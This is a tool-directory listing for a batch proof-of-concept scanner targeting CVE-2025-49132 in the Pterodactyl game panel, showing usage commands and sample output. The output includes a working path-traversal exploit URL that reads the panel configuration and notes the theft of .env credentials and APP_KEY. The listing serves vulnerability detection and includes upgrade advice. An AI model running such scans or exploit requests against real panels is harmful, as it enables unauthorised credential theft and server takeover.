Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-49132_poc — Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓 | Kitploit
Tools/GitHubGitHub/qiaojojo/cve-2025-49132_poc
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubqiaojojo/cve-2025-49132_poc

CVE-2025-49132_poc

Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓

View Repository
41 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-49132_poc

Usage Examples

  1. Scan a single target:
root@kitploit:~
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
  1. Scan a list of targets:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f targets.txt
  1. Save scan results:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f targets.txt -o scan_results.txt

Example Output:

When vulnerability exists:

root@kitploit:~
[+] Vulnerability exists: Vulnerability confirmed

    Vulnerability details:
      • Vulnerability type: Path traversal
      • Attack vector: Access /locales/locale.json via path traversal parameter
      • Exploit URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
      
    Potential impact:
      • Read credentials in panel configuration file (.env)
      • Extract sensitive information from the database
      • Access game server files managed by the panel
    
    Extracted APP_KEY: base64{{your_secret_key_here}}
    
    Remediation advice: Upgrade immediately to Pterodactyl v1.11.11 or later

When no vulnerability exists:

root@kitploit:~
[-] No vulnerability exists: No vulnerability found (status code: 404)

Scan Summary:

root@kitploit:~
Scan Summary:
  • Total targets scanned: 5
  • Vulnerable targets: 2
  • Secure targets: 3

[!] Critical: Vulnerable systems detected! Immediate action required.
Download Tool